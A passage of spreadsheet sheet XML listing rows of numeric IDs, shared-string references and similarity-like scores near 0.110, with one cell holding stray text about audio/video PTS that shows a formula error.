      <c r="C31166" s="2" t="s">
        <v>29970</v>
      </c>
      <c r="D31166" s="2">
        <v>1.0</v>
      </c>
      <c r="E31166" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31166" s="2">
        <v>0.110200364298725</v>
      </c>
    </row>
    <row r="31167" ht="15.75" customHeight="1">
      <c r="A31167" s="1">
        <v>31565.0</v>
      </c>
      <c r="B31167" s="2">
        <v>5122488.0</v>
      </c>
      <c r="C31167" s="2" t="s">
        <v>29971</v>
      </c>
      <c r="D31167" s="2">
        <v>1.0</v>
      </c>
      <c r="E31167" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31167" s="2">
        <v>0.110200364298725</v>
      </c>
    </row>
    <row r="31168" ht="15.75" customHeight="1">
      <c r="A31168" s="1">
        <v>4676.0</v>
      </c>
      <c r="B31168" s="2">
        <v>4.3172934E7</v>
      </c>
      <c r="C31168" s="2" t="str">
        <f> UPDATE =========
I've put a couple of identity elements after the audio, and video (directly after), and charted the PTS of their outputs.</f>
        <v>#ERROR!</v>
      </c>
      <c r="D31168" s="2">
        <v>1.0</v>
      </c>
      <c r="E31168" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31168" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="31169" ht="15.75" customHeight="1">
      <c r="A31169" s="1">
        <v>6083.0</v>
      </c>
      <c r="B31169" s="2">
        <v>4.7682541E7</v>
      </c>
      <c r="C31169" s="2" t="s">
        <v>29972</v>
      </c>
      <c r="D31169" s="2">
        <v>1.0</v>
      </c>
      <c r="E31169" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31169" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="31170" ht="15.75" customHeight="1">
      <c r="A31170" s="1">
        <v>19314.0</v>
      </c>
      <c r="B31170" s="2">
        <v>5.5285853E7</v>
      </c>
      <c r="C31170" s="2" t="s">
        <v>29973</v>
      </c>
      <c r="D31170" s="2">
        <v>1.0</v>
      </c>
      <c r="E31170" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31170" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="31171" ht="15.75" customHeight="1">
      <c r="A31171" s="1">
        <v>4078.0</v>
      </c>
      <c r="B31171" s="2">
        <v>4.1187036E7</v>
      </c>
      <c r="C31171" s="2" t="s">
        <v>29974</v>
      </c>
      <c r="D31171" s="2">
        <v>1.0</v>
      </c>
      <c r="E31171" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31171" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="31172" ht="15.75" customHeight="1">
      <c r="A31172" s="1">
        <v>7146.0</v>
      </c>
      <c r="B31172" s="2">
        <v>5.0464054E7</v>
      </c>
      <c r="C31172" s="2" t="s">
        <v>29975</v>
      </c>
      <c r="D31172" s="2">
        <v>1.0</v>
      </c>
      <c r="E31172" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31172" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="31173" ht="15.75" customHeight="1">
      <c r="A31173" s="1">
        <v>10357.0</v>
      </c>
      <c r="B31173" s="2">
        <v>7276797.0</v>
      </c>
      <c r="C31173" s="2" t="s">
        <v>29976</v>
      </c>
      <c r="D31173" s="2">
        <v>1.0</v>
      </c>
      <c r="E31173" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31173" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="31174" ht="15.75" customHeight="1">
      <c r="A31174" s="1">
        <v>9949.0</v>
      </c>
      <c r="B31174" s="2">
        <v>5.6890562E7</v>
      </c>
      <c r="C31174" s="2" t="s">
        <v>29977</v>
      </c>
      <c r="D31174" s="2">
        <v>1.0</v>
      </c>
      <c r="E31174" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31174" s="2">
        <v>0.1101532567049809</v>
      </c>
    </row>
    <row r="31175" ht="15.75" customHeight="1">
      <c r="A31175" s="1">
        <v>19226.0</v>
      </c>
      <c r="B31175" s="2">
        <v>5.5051404E7</v>
      </c>
      <c r="C31175" s="2" t="s">
        <v>29978</v>
      </c>
      <c r="D31175" s="2">
        <v>1.0</v>
      </c>
      <c r="E31175" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31175" s="2">
        <v>0.1101532567049809</v>
      </c>
    </row>
    <row r="31176" ht="15.75" customHeight="1">
      <c r="A31176" s="1">
        <v>4402.0</v>
      </c>
      <c r="B31176" s="2">
        <v>4.227856E7</v>
      </c>
      <c r="C31176" s="2" t="s">
        <v>29979</v>
      </c>
      <c r="D31176" s="2">
        <v>1.0</v>
      </c>
      <c r="E31176" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31176" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="31177" ht="15.75" customHeight="1">
      <c r="A31177" s="1">
        <v>5111.0</v>
      </c>
      <c r="B31177" s="2">
        <v>4.4541263E7</v>
      </c>
      <c r="C31177" s="2" t="s">
        <v>29980</v>
      </c>
      <c r="D31177" s="2">
        <v>1.0</v>
      </c>
      <c r="E31177" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31177" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="31178" ht="15.75" customHeight="1">
      <c r="A31178" s="1">
        <v>11528.0</v>
      </c>
      <c r="B31178" s="2">
        <v>2.2464834E7</v>
      </c>
      <c r="C31178" s="2" t="s">
        <v>29981</v>
      </c>
      <c r="D31178" s="2">
        <v>1.0</v>
      </c>
      <c r="E31178" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31178" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="31179" ht="15.75" customHeight="1">
      <c r="A31179" s="1">
        <v>16737.0</v>
      </c>
      <c r="B31179" s="2">
        <v>4.7522471E7</v>
      </c>
      <c r="C31179" s="2" t="s">
        <v>29982</v>
      </c>
      <c r="D31179" s="2">
        <v>1.0</v>
      </c>
      <c r="E31179" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31179" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="31180" ht="15.75" customHeight="1">
      <c r="A31180" s="1">
        <v>18652.0</v>
      </c>
      <c r="B31180" s="2">
        <v>5.3466944E7</v>
      </c>
      <c r="C31180" s="2" t="s">
        <v>29983</v>
      </c>
      <c r="D31180" s="2">
        <v>1.0</v>
      </c>
      <c r="E31180" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31180" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="31181" ht="15.75" customHeight="1">
      <c r="A31181" s="1">
        <v>26045.0</v>
      </c>
      <c r="B31181" s="2">
        <v>1.5480661E7</v>
      </c>
      <c r="C31181" s="2" t="s">
        <v>29984</v>
      </c>
      <c r="D31181" s="2">
        <v>1.0</v>
      </c>
      <c r="E31181" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31181" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="31182" ht="15.75" customHeight="1">
      <c r="A31182" s="1">
        <v>26361.0</v>
      </c>
      <c r="B31182" s="2">
        <v>1.6861717E7</v>
      </c>
      <c r="C31182" s="2" t="s">
        <v>29985</v>
      </c>
      <c r="D31182" s="2">
        <v>1.0</v>
      </c>
      <c r="E31182" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31182" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="31183" ht="15.75" customHeight="1">
      <c r="A31183" s="1">
        <v>27337.0</v>
      </c>
      <c r="B31183" s="2">
        <v>2.1456103E7</v>
      </c>
      <c r="C31183" s="2" t="s">
        <v>29986</v>
      </c>
      <c r="D31183" s="2">
        <v>1.0</v>
      </c>
      <c r="E31183" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31183" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="31184" ht="15.75" customHeight="1">
      <c r="A31184" s="1">
        <v>30711.0</v>
      </c>
      <c r="B31184" s="2">
        <v>4.3062376E7</v>
      </c>
      <c r="C31184" s="2" t="s">
        <v>29987</v>
      </c>
      <c r="D31184" s="2">
        <v>1.0</v>
      </c>
      <c r="E31184" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31184" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="31185" ht="15.75" customHeight="1">
      <c r="A31185" s="1">
        <v>10362.0</v>
      </c>
      <c r="B31185" s="2">
        <v>7770973.0</v>
      </c>
      <c r="C31185" s="2" t="s">
        <v>29988</v>
      </c>
      <c r="D31185" s="2">
        <v>1.0</v>
      </c>
      <c r="E31185" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31185" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="31186" ht="15.75" customHeight="1">
      <c r="A31186" s="1">
        <v>16328.0</v>
      </c>
      <c r="B31186" s="2">
        <v>4.600137E7</v>
      </c>
      <c r="C31186" s="2" t="s">
        <v>29989</v>
      </c>
      <c r="D31186" s="2">
        <v>1.0</v>
      </c>
      <c r="E31186" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31186" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="31187" ht="15.75" customHeight="1">
      <c r="A31187" s="1">
        <v>18931.0</v>
      </c>
      <c r="B31187" s="2">
        <v>5.4261811E7</v>
      </c>
      <c r="C31187" s="2" t="s">
        <v>29990</v>
      </c>
      <c r="D31187" s="2">
        <v>1.0</v>
      </c>
      <c r="E31187" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31187" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="31188" ht="15.75" customHeight="1">
      <c r="A31188" s="1">
        <v>26571.0</v>
      </c>
      <c r="B31188" s="2">
        <v>1.7856901E7</v>
      </c>
      <c r="C31188" s="2" t="s">
        <v>29991</v>
      </c>
      <c r="D31188" s="2">
        <v>1.0</v>
      </c>
      <c r="E31188" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31188" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="31189" ht="15.75" customHeight="1">
      <c r="A31189" s="1">
        <v>27340.0</v>
      </c>
      <c r="B31189" s="2">
        <v>2.1456103E7</v>
      </c>
      <c r="C31189" s="2" t="s">
        <v>29992</v>
      </c>
      <c r="D31189" s="2">
        <v>1.0</v>
      </c>
      <c r="E31189" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31189" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="31190" ht="15.75" customHeight="1">
      <c r="A31190" s="1">
        <v>28735.0</v>
      </c>
      <c r="B31190" s="2">
        <v>2.8007392E7</v>
      </c>
      <c r="C31190" s="2" t="s">
        <v>29944</v>
      </c>
      <c r="D31190" s="2">
        <v>1.0</v>
      </c>
      <c r="E31190" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31190" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="31191" ht="15.75" customHeight="1">
      <c r="A31191" s="1">
        <v>31357.0</v>
      </c>
      <c r="B31191" s="2">
        <v>4.9868263E7</v>
      </c>
      <c r="C31191" s="2" t="s">
        <v>29993</v>
      </c>
      <c r="D31191" s="2">
        <v>1.0</v>
      </c>
      <c r="E31191" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31191" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="31192" ht="15.75" customHeight="1">
      <c r="A31192" s="1">
        <v>194.0</v>
      </c>
      <c r="B31192" s="2">
        <v>1.4403305E7</v>
      </c>
      <c r="C31192" s="2" t="s">
        <v>29994</v>
      </c>
      <c r="D31192" s="2">
        <v>1.0</v>
      </c>
      <c r="E31192" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31192" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31193" ht="15.75" customHeight="1">
      <c r="A31193" s="1">
        <v>458.0</v>
      </c>
      <c r="B31193" s="2">
        <v>1.7257059E7</v>
      </c>
      <c r="C31193" s="2" t="s">
        <v>29995</v>
      </c>
      <c r="D31193" s="2">
        <v>1.0</v>
      </c>
      <c r="E31193" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31193" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31194" ht="15.75" customHeight="1">
      <c r="A31194" s="1">
        <v>961.0</v>
      </c>
      <c r="B31194" s="2">
        <v>2.2699094E7</v>
      </c>
      <c r="C31194" s="2" t="s">
        <v>29996</v>
      </c>
      <c r="D31194" s="2">
        <v>1.0</v>
      </c>
      <c r="E31194" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31194" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31195" ht="15.75" customHeight="1">
      <c r="A31195" s="1">
        <v>1028.0</v>
      </c>
      <c r="B31195" s="2">
        <v>2.3180755E7</v>
      </c>
      <c r="C31195" s="2" t="s">
        <v>29997</v>
      </c>
      <c r="D31195" s="2">
        <v>1.0</v>
      </c>
      <c r="E31195" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31195" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31196" ht="15.75" customHeight="1">
      <c r="A31196" s="1">
        <v>1721.0</v>
      </c>
      <c r="B31196" s="2">
        <v>2.8654769E7</v>
      </c>
      <c r="C31196" s="2" t="s">
        <v>29998</v>
      </c>
      <c r="D31196" s="2">
        <v>1.0</v>
      </c>
      <c r="E31196" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31196" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31197" ht="15.75" customHeight="1">
      <c r="A31197" s="1">
        <v>1751.0</v>
      </c>
      <c r="B31197" s="2">
        <v>2.8863651E7</v>
      </c>
      <c r="C31197" s="2" t="s">
        <v>29999</v>
      </c>
      <c r="D31197" s="2">
        <v>1.0</v>
      </c>
      <c r="E31197" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31197" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31198" ht="15.75" customHeight="1">
      <c r="A31198" s="1">
        <v>2166.0</v>
      </c>
      <c r="B31198" s="2">
        <v>3.176271E7</v>
      </c>
      <c r="C31198" s="2" t="s">
        <v>30000</v>
      </c>
      <c r="D31198" s="2">
        <v>1.0</v>
      </c>
      <c r="E31198" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31198" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31199" ht="15.75" customHeight="1">
      <c r="A31199" s="1">
        <v>3094.0</v>
      </c>
      <c r="B31199" s="2">
        <v>3.6684961E7</v>
      </c>
      <c r="C31199" s="2" t="s">
        <v>30001</v>
      </c>
      <c r="D31199" s="2">
        <v>1.0</v>
      </c>
      <c r="E31199" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31199" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31200" ht="15.75" customHeight="1">
      <c r="A31200" s="1">
        <v>3133.0</v>
      </c>
      <c r="B31200" s="2">
        <v>3.6864242E7</v>
      </c>
      <c r="C31200" s="2" t="s">
        <v>30002</v>
      </c>
      <c r="D31200" s="2">
        <v>1.0</v>
      </c>
      <c r="E31200" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31200" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31201" ht="15.75" customHeight="1">
      <c r="A31201" s="1">
        <v>3505.0</v>
      </c>
      <c r="B31201" s="2">
        <v>3.8539737E7</v>
      </c>
      <c r="C31201" s="2" t="s">
        <v>30003</v>
      </c>
      <c r="D31201" s="2">
        <v>1.0</v>
      </c>
      <c r="E31201" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31201" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31202" ht="15.75" customHeight="1">
      <c r="A31202" s="1">
        <v>3607.0</v>
      </c>
      <c r="B31202" s="2">
        <v>3.9100684E7</v>
      </c>
      <c r="C31202" s="2" t="s">
        <v>30004</v>
      </c>
      <c r="D31202" s="2">
        <v>1.0</v>
      </c>
      <c r="E31202" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31202" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31203" ht="15.75" customHeight="1">
      <c r="A31203" s="1">
        <v>3891.0</v>
      </c>
      <c r="B31203" s="2">
        <v>4.0398717E7</v>
      </c>
      <c r="C31203" s="2" t="s">
        <v>30005</v>
      </c>
      <c r="D31203" s="2">
        <v>1.0</v>
      </c>
      <c r="E31203" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31203" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31204" ht="15.75" customHeight="1">
      <c r="A31204" s="1">
        <v>4670.0</v>
      </c>
      <c r="B31204" s="2">
        <v>4.3146956E7</v>
      </c>
      <c r="C31204" s="2" t="s">
        <v>30006</v>
      </c>
      <c r="D31204" s="2">
        <v>1.0</v>
      </c>
      <c r="E31204" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31204" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31205" ht="15.75" customHeight="1">
      <c r="A31205" s="1">
        <v>4773.0</v>
      </c>
      <c r="B31205" s="2">
        <v>4.3438859E7</v>
      </c>
      <c r="C31205" s="2" t="s">
        <v>30007</v>
      </c>
      <c r="D31205" s="2">
        <v>1.0</v>
      </c>
      <c r="E31205" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31205" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31206" ht="15.75" customHeight="1">
      <c r="A31206" s="1">
        <v>4888.0</v>
      </c>
      <c r="B31206" s="2">
        <v>4.386801E7</v>
      </c>
      <c r="C31206" s="2" t="s">
        <v>30008</v>
      </c>
      <c r="D31206" s="2">
        <v>1.0</v>
      </c>
      <c r="E31206" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31206" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31207" ht="15.75" customHeight="1">
      <c r="A31207" s="1">
        <v>5059.0</v>
      </c>
      <c r="B31207" s="2">
        <v>4.4355064E7</v>
      </c>
      <c r="C31207" s="2" t="s">
        <v>30009</v>
      </c>
      <c r="D31207" s="2">
        <v>1.0</v>
      </c>
      <c r="E31207" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31207" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31208" ht="15.75" customHeight="1">
      <c r="A31208" s="1">
        <v>5628.0</v>
      </c>
      <c r="B31208" s="2">
        <v>4.6203822E7</v>
      </c>
      <c r="C31208" s="2" t="s">
        <v>30010</v>
      </c>
      <c r="D31208" s="2">
        <v>1.0</v>
      </c>
      <c r="E31208" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31208" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31209" ht="15.75" customHeight="1">
      <c r="A31209" s="1">
        <v>5768.0</v>
      </c>
      <c r="B31209" s="2">
        <v>4.6706186E7</v>
      </c>
      <c r="C31209" s="2" t="s">
        <v>30011</v>
      </c>
      <c r="D31209" s="2">
        <v>1.0</v>
      </c>
      <c r="E31209" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31209" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31210" ht="15.75" customHeight="1">
      <c r="A31210" s="1">
        <v>6849.0</v>
      </c>
      <c r="B31210" s="2">
        <v>4.9642181E7</v>
      </c>
      <c r="C31210" s="2" t="s">
        <v>30012</v>
      </c>
      <c r="D31210" s="2">
        <v>1.0</v>
      </c>
      <c r="E31210" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31210" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31211" ht="15.75" customHeight="1">
      <c r="A31211" s="1">
        <v>6868.0</v>
      </c>
      <c r="B31211" s="2">
        <v>4.9682879E7</v>
      </c>
      <c r="C31211" s="2" t="s">
        <v>30013</v>
      </c>
      <c r="D31211" s="2">
        <v>1.0</v>
      </c>
      <c r="E31211" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31211" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31212" ht="15.75" customHeight="1">
      <c r="A31212" s="1">
        <v>7359.0</v>
      </c>
      <c r="B31212" s="2">
        <v>5.1002975E7</v>
      </c>
      <c r="C31212" s="2" t="s">
        <v>30014</v>
      </c>
      <c r="D31212" s="2">
        <v>1.0</v>
      </c>
      <c r="E31212" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31212" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31213" ht="15.75" customHeight="1">
      <c r="A31213" s="1">
        <v>7421.0</v>
      </c>
      <c r="B31213" s="2">
        <v>5.1150322E7</v>
      </c>
      <c r="C31213" s="2" t="s">
        <v>30015</v>
      </c>
      <c r="D31213" s="2">
        <v>1.0</v>
      </c>
      <c r="E31213" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31213" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31214" ht="15.75" customHeight="1">
      <c r="A31214" s="1">
        <v>7517.0</v>
      </c>
      <c r="B31214" s="2">
        <v>5.1411015E7</v>
      </c>
      <c r="C31214" s="2" t="s">
        <v>30016</v>
      </c>
      <c r="D31214" s="2">
        <v>1.0</v>
      </c>
      <c r="E31214" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31214" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31215" ht="15.75" customHeight="1">
      <c r="A31215" s="1">
        <v>7855.0</v>
      </c>
      <c r="B31215" s="2">
        <v>5.2358579E7</v>
      </c>
      <c r="C31215" s="2" t="s">
        <v>30017</v>
      </c>
      <c r="D31215" s="2">
        <v>1.0</v>
      </c>
      <c r="E31215" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31215" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31216" ht="15.75" customHeight="1">
      <c r="A31216" s="1">
        <v>7936.0</v>
      </c>
      <c r="B31216" s="2">
        <v>5.2593695E7</v>
      </c>
      <c r="C31216" s="2" t="s">
        <v>30018</v>
      </c>
      <c r="D31216" s="2">
        <v>1.0</v>
      </c>
      <c r="E31216" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31216" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31217" ht="15.75" customHeight="1">
      <c r="A31217" s="1">
        <v>8124.0</v>
      </c>
      <c r="B31217" s="2">
        <v>5.3081925E7</v>
      </c>
      <c r="C31217" s="2" t="s">
        <v>30019</v>
      </c>
      <c r="D31217" s="2">
        <v>1.0</v>
      </c>
      <c r="E31217" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31217" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31218" ht="15.75" customHeight="1">
      <c r="A31218" s="1">
        <v>8261.0</v>
      </c>
      <c r="B31218" s="2">
        <v>5.3414916E7</v>
      </c>
      <c r="C31218" s="2" t="s">
        <v>30020</v>
      </c>
      <c r="D31218" s="2">
        <v>1.0</v>
      </c>
      <c r="E31218" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31218" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31219" ht="15.75" customHeight="1">
      <c r="A31219" s="1">
        <v>8325.0</v>
      </c>
      <c r="B31219" s="2">
        <v>5.3643821E7</v>
      </c>
      <c r="C31219" s="2" t="s">
        <v>30021</v>
      </c>
      <c r="D31219" s="2">
        <v>1.0</v>
      </c>
      <c r="E31219" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31219" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31220" ht="15.75" customHeight="1">
      <c r="A31220" s="1">
        <v>8513.0</v>
      </c>
      <c r="B31220" s="2">
        <v>5.4067421E7</v>
      </c>
      <c r="C31220" s="2" t="s">
        <v>30022</v>
      </c>
      <c r="D31220" s="2">
        <v>1.0</v>
      </c>
      <c r="E31220" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31220" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31221" ht="15.75" customHeight="1">
      <c r="A31221" s="1">
        <v>8672.0</v>
      </c>
      <c r="B31221" s="2">
        <v>5.4377684E7</v>
      </c>
      <c r="C31221" s="2" t="s">
        <v>30023</v>
      </c>
      <c r="D31221" s="2">
        <v>1.0</v>
      </c>
      <c r="E31221" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31221" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31222" ht="15.75" customHeight="1">
      <c r="A31222" s="1">
        <v>8942.0</v>
      </c>
      <c r="B31222" s="2">
        <v>5.4892512E7</v>
      </c>
      <c r="C31222" s="2" t="s">
        <v>30024</v>
      </c>
      <c r="D31222" s="2">
        <v>1.0</v>
      </c>
      <c r="E31222" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31222" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31223" ht="15.75" customHeight="1">
      <c r="A31223" s="1">
        <v>9169.0</v>
      </c>
      <c r="B31223" s="2">
        <v>5.5336854E7</v>
      </c>
      <c r="C31223" s="2" t="s">
        <v>30025</v>
      </c>
      <c r="D31223" s="2">
        <v>1.0</v>
      </c>
      <c r="E31223" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31223" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31224" ht="15.75" customHeight="1">
      <c r="A31224" s="1">
        <v>9199.0</v>
      </c>
      <c r="B31224" s="2">
        <v>5.5398084E7</v>
      </c>
      <c r="C31224" s="2" t="s">
        <v>30026</v>
      </c>
      <c r="D31224" s="2">
        <v>1.0</v>
      </c>
      <c r="E31224" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31224" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31225" ht="15.75" customHeight="1">
      <c r="A31225" s="1">
        <v>9503.0</v>
      </c>
      <c r="B31225" s="2">
        <v>5.5934473E7</v>
      </c>
      <c r="C31225" s="2" t="s">
        <v>30027</v>
      </c>
      <c r="D31225" s="2">
        <v>1.0</v>
      </c>
      <c r="E31225" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31225" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31226" ht="15.75" customHeight="1">
      <c r="A31226" s="1">
        <v>9876.0</v>
      </c>
      <c r="B31226" s="2">
        <v>5.6745122E7</v>
      </c>
      <c r="C31226" s="2" t="s">
        <v>30028</v>
      </c>
      <c r="D31226" s="2">
        <v>1.0</v>
      </c>
      <c r="E31226" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31226" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31227" ht="15.75" customHeight="1">
      <c r="A31227" s="1">
        <v>10238.0</v>
      </c>
      <c r="B31227" s="2">
        <v>5.7525102E7</v>
      </c>
      <c r="C31227" s="2" t="s">
        <v>30029</v>
      </c>
      <c r="D31227" s="2">
        <v>1.0</v>
      </c>
      <c r="E31227" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31227" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31228" ht="15.75" customHeight="1">
      <c r="A31228" s="1">
        <v>10242.0</v>
      </c>
      <c r="B31228" s="2">
        <v>5.7529545E7</v>
      </c>
      <c r="C31228" s="2" t="s">
        <v>30030</v>
      </c>
      <c r="D31228" s="2">
        <v>1.0</v>
      </c>
      <c r="E31228" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31228" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31229" ht="15.75" customHeight="1">
      <c r="A31229" s="1">
        <v>10291.0</v>
      </c>
      <c r="B31229" s="2">
        <v>5.7645408E7</v>
      </c>
      <c r="C31229" s="2" t="s">
        <v>30031</v>
      </c>
      <c r="D31229" s="2">
        <v>1.0</v>
      </c>
      <c r="E31229" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31229" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31230" ht="15.75" customHeight="1">
      <c r="A31230" s="1">
        <v>10622.0</v>
      </c>
      <c r="B31230" s="2">
        <v>1.3782366E7</v>
      </c>
      <c r="C31230" s="2" t="s">
        <v>30032</v>
      </c>
      <c r="D31230" s="2">
        <v>1.0</v>
      </c>
      <c r="E31230" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31230" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31231" ht="15.75" customHeight="1">
      <c r="A31231" s="1">
        <v>10672.0</v>
      </c>
      <c r="B31231" s="2">
        <v>1.453134E7</v>
      </c>
      <c r="C31231" s="2" t="s">
        <v>30033</v>
      </c>
      <c r="D31231" s="2">
        <v>1.0</v>
      </c>
      <c r="E31231" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31231" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31232" ht="15.75" customHeight="1">
      <c r="A31232" s="1">
        <v>11255.0</v>
      </c>
      <c r="B31232" s="2">
        <v>2.057841E7</v>
      </c>
      <c r="C31232" s="2" t="s">
        <v>30034</v>
      </c>
      <c r="D31232" s="2">
        <v>1.0</v>
      </c>
      <c r="E31232" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31232" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31233" ht="15.75" customHeight="1">
      <c r="A31233" s="1">
